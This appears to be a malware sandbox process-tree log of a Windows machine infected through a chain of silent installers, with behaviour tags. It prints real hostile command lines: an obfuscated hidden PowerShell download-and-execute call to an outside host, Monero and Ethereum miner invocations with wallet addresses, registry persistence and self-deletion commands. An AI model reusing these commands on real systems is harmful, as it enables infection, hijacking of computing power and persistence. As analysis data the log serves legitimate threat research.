- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\aflkskcyyol\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\aflkskcyyol\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UF2U1.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-UF2U1.tmp\Setup3310.tmp" /SL5="$405D0,138429,56832,C:\Users\Admin\AppData\Local\Temp\aflkskcyyol\Setup3310.exe" /Verysilent /subid=5779⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RB5DI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RB5DI.tmp\Setup.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\jhc3vjenbtf\mqbzzzczgam.exe"C:\Users\Admin\AppData\Local\Temp\jhc3vjenbtf\mqbzzzczgam.exe" /ustwo INSTALL8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "mqbzzzczgam.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\jhc3vjenbtf\mqbzzzczgam.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "mqbzzzczgam.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\cstbvidpmbs\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\cstbvidpmbs\cpyrix.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵
-
C:\Users\Admin\AppData\Local\Temp\canm3bvd4sz\app.exe"C:\Users\Admin\AppData\Local\Temp\canm3bvd4sz\app.exe" /8-238⤵
-
C:\Users\Admin\AppData\Local\Temp\3fxbgct42rv\vict.exe"C:\Users\Admin\AppData\Local\Temp\3fxbgct42rv\vict.exe" /VERYSILENT /id=5358⤵
-
C:\Users\Admin\AppData\Local\Temp\is-KQPDL.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-KQPDL.tmp\vict.tmp" /SL5="$30706,870426,780800,C:\Users\Admin\AppData\Local\Temp\3fxbgct42rv\vict.exe" /VERYSILENT /id=5359⤵
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\is-PGAO4.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-PGAO4.tmp\win1host.exe" 53510⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IR8HI.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-IR8HI.tmp\ppppppfy.exe" /S /UID=lab2141⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\AILBFCIUWQ\prolab.exe"C:\Users\Admin\AppData\Local\Temp\AILBFCIUWQ\prolab.exe" /VERYSILENT2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-VBKV2.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-VBKV2.tmp\prolab.tmp" /SL5="$2027C,575243,216576,C:\Users\Admin\AppData\Local\Temp\AILBFCIUWQ\prolab.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\d4-eadf2-f9c-cd695-4e62110b9f3cc\Jaewowubidae.exe"C:\Users\Admin\AppData\Local\Temp\d4-eadf2-f9c-cd695-4e62110b9f3cc\Jaewowubidae.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rzs0ihkj.lzn\md6_6ydj.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\rzs0ihkj.lzn\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\rzs0ihkj.lzn\md6_6ydj.exe4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3dgw2qrm.meb\askinstall31.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\3dgw2qrm.meb\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\3dgw2qrm.meb\askinstall31.exe4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcyqct3h.fb2\toolspab1.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\tcyqct3h.fb2\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\tcyqct3h.fb2\toolspab1.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tcyqct3h.fb2\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\tcyqct3h.fb2\toolspab1.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bqropnep.5we\GcleanerWW.exe /mixone & exit3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2nstij4b.kf0\setup_10.2_mix.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\2nstij4b.kf0\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\2nstij4b.kf0\setup_10.2_mix.exe4⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "5⤵
- Checks computer location settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cauxzq01.ajn\file.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\cauxzq01.ajn\file.exeC:\Users\Admin\AppData\Local\Temp\cauxzq01.ajn\file.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\4FHSS958VD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4FHSS958VD\multitimer.exe" 0 3060197d33d91c80.94013368 0 1016⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\4FHSS958VD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4FHSS958VD\multitimer.exe" 1 3.1617574197.606a39354d1a7 1017⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\4FHSS958VD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4FHSS958VD\multitimer.exe" 2 3.1617574197.606a39354d1a78⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\3rxdilzjtnm\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\3rxdilzjtnm\Setup3310.exe" /Verysilent /subid=5779⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-H71CN.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-H71CN.tmp\Setup3310.tmp" /SL5="$10690,138429,56832,C:\Users\Admin\AppData\Local\Temp\3rxdilzjtnm\Setup3310.exe" /Verysilent /subid=57710⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-PDBVV.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PDBVV.tmp\Setup.exe" /Verysilent11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\1z31zpr213s\app.exe"C:\Users\Admin\AppData\Local\Temp\1z31zpr213s\app.exe" /8-239⤵
-
C:\Users\Admin\AppData\Local\Temp\hzce4thi24b\vict.exe"C:\Users\Admin\AppData\Local\Temp\hzce4thi24b\vict.exe" /VERYSILENT /id=5359⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\oijfrqe0dx3\4gx0smk43dk.exe"C:\Users\Admin\AppData\Local\Temp\oijfrqe0dx3\4gx0smk43dk.exe" /ustwo INSTALL9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4gx0smk43dk.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\oijfrqe0dx3\4gx0smk43dk.exe" & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4gx0smk43dk.exe" /f11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\qhxeg2cgvr0\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\qhxeg2cgvr0\cpyrix.exe" /VERYSILENT9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"11⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"11⤵
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"11⤵
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"11⤵
-
C:\Users\Admin\AppData\Local\Temp\77LMZQK074\setups.exe"C:\Users\Admin\AppData\Local\Temp\77LMZQK074\setups.exe" ll6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-NTVVN.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-NTVVN.tmp\setups.tmp" /SL5="$504AC,454998,229376,C:\Users\Admin\AppData\Local\Temp\77LMZQK074\setups.exe" ll7⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"5⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install7⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\CF23.tmp.exe"C:\Users\Admin\AppData\Roaming\CF23.tmp.exe"6⤵
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w16119 --cpu-max-threads-hint 50 -r 99997⤵
- Blocklisted process makes network request
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w2389@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999997⤵
-
C:\Users\Admin\AppData\Roaming\D3E7.tmp.exe"C:\Users\Admin\AppData\Roaming\D3E7.tmp.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\D3E7.tmp.exe7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 38⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.17⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"5⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0qwuf5qy.m4y\app.exe /8-2222 & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\0qwuf5qy.m4y\app.exeC:\Users\Admin\AppData\Local\Temp\0qwuf5qy.m4y\app.exe /8-22224⤵
-
C:\Users\Admin\AppData\Local\Temp\0qwuf5qy.m4y\app.exe"C:\Users\Admin\AppData\Local\Temp\0qwuf5qy.m4y\app.exe" /8-22225⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\le1c11ja.jdh\Four.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\le1c11ja.jdh\Four.exeC:\Users\Admin\AppData\Local\Temp\le1c11ja.jdh\Four.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\MXIJ8MLD1I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MXIJ8MLD1I\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1045⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\MXIJ8MLD1I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MXIJ8MLD1I\multitimer.exe" 1 3.1617574273.606a398142a26 1046⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\MXIJ8MLD1I\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MXIJ8MLD1I\multitimer.exe" 2 3.1617574273.606a398142a267⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\2lckn1mxu2c\vict.exe"C:\Users\Admin\AppData\Local\Temp\2lckn1mxu2c\vict.exe" /VERYSILENT /id=5358⤵
-
C:\Users\Admin\AppData\Local\Temp\is-RMSTE.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-RMSTE.tmp\vict.tmp" /SL5="$3066C,870426,780800,C:\Users\Admin\AppData\Local\Temp\2lckn1mxu2c\vict.exe" /VERYSILENT /id=5359⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IAS8F.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-IAS8F.tmp\win1host.exe" 53510⤵
-
C:\Users\Admin\AppData\Local\Temp\d5h3zkyqdvn\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\d5h3zkyqdvn\cpyrix.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵
-
C:\Users\Admin\AppData\Local\Temp\ab2imx25nvs\cenllha0p14.exe"C:\Users\Admin\AppData\Local\Temp\ab2imx25nvs\cenllha0p14.exe" /ustwo INSTALL8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "cenllha0p14.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ab2imx25nvs\cenllha0p14.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "cenllha0p14.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\5tcem25n4ya\app.exe"C:\Users\Admin\AppData\Local\Temp\5tcem25n4ya\app.exe" /8-238⤵
-
C:\Users\Admin\AppData\Local\Temp\sfmeopw432g\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\sfmeopw432g\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3UJHA.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-3UJHA.tmp\Setup3310.tmp" /SL5="$506B0,138429,56832,C:\Users\Admin\AppData\Local\Temp\sfmeopw432g\Setup3310.exe" /Verysilent /subid=5779⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6IV28.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6IV28.tmp\Setup.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\2EGCV0CEQJ\setups.exe"C:\Users\Admin\AppData\Local\Temp\2EGCV0CEQJ\setups.exe" ll5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A0KP8.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-A0KP8.tmp\setups.tmp" /SL5="$20782,454998,229376,C:\Users\Admin\AppData\Local\Temp\2EGCV0CEQJ\setups.exe" ll6⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\26-b6064-211-b8a9b-4718e5973e679\Xateqeryhae.exe"C:\Users\Admin\AppData\Local\Temp\26-b6064-211-b8a9b-4718e5973e679\Xateqeryhae.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\is-PA7S9.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-PA7S9.tmp\setups.tmp" /SL5="$7006C,454998,229376,C:\Users\Admin\AppData\Local\Temp\AU4TMKRUWS\setups.exe" ll1⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"C:\Program Files (x86)\Picture Lab\Pictures Lab.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-90K0L.tmp\lxsajuyiswe.tmp"C:\Users\Admin\AppData\Local\Temp\is-90K0L.tmp\lxsajuyiswe.tmp" /SL5="$70136,2592217,780800,C:\Users\Admin\AppData\Local\Temp\4is40zjc04k\lxsajuyiswe.exe" /VERYSILENT1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-A9PSF.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-A9PSF.tmp\winlthsth.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Buils84Dy.exe"C:\Users\Admin\AppData\Local\Temp\Buils84Dy.exe"3⤵
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe5⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\is-P00K6.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-P00K6.tmp\vpn.tmp" /SL5="$10392,15170975,270336,C:\Users\Admin\AppData\Local\Temp\om1qokg25qe\vpn.exe" /silent /subid=4821⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Users\Admin\AppData\Local\Temp\is-H1HLT.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-H1HLT.tmp\IBInstaller_97039.tmp" /SL5="$10394,14575459,721408,C:\Users\Admin\AppData\Local\Temp\ntxhjie4v5p\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V17HG.tmp\{app}\microsoft.cab -F:* %ProgramData%2⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-V17HG.tmp\{app}\microsoft.cab -F:* C:\ProgramData3⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=2⤵
- Checks computer location settings
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-V17HG.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-V17HG.tmp\{app}\chrome_proxy.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-V17HG.tmp\{app}\chrome_proxy.exe"3⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 44⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\is-G8P3M.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-G8P3M.tmp\vict.tmp" /SL5="$1038A,870426,780800,C:\Users\Admin\AppData\Local\Temp\u1k43i5dbkz\vict.exe" /VERYSILENT /id=5351⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-BBU7N.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-BBU7N.tmp\win1host.exe" 5352⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\eFR1hSZZY.exe"C:\Users\Admin\AppData\Local\Temp\eFR1hSZZY.exe"3⤵
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5228 -s 10083⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E8016DD5D25D35C6032B213185F328A1 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E46823F2EA5A2222E5645294EE292E8F2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1ec,0x1f0,0x1f4,0x1c8,0x1f8,0x7ffcb5539ec0,0x7ffcb5539ed0,0x7ffcb5539ee05⤵
-
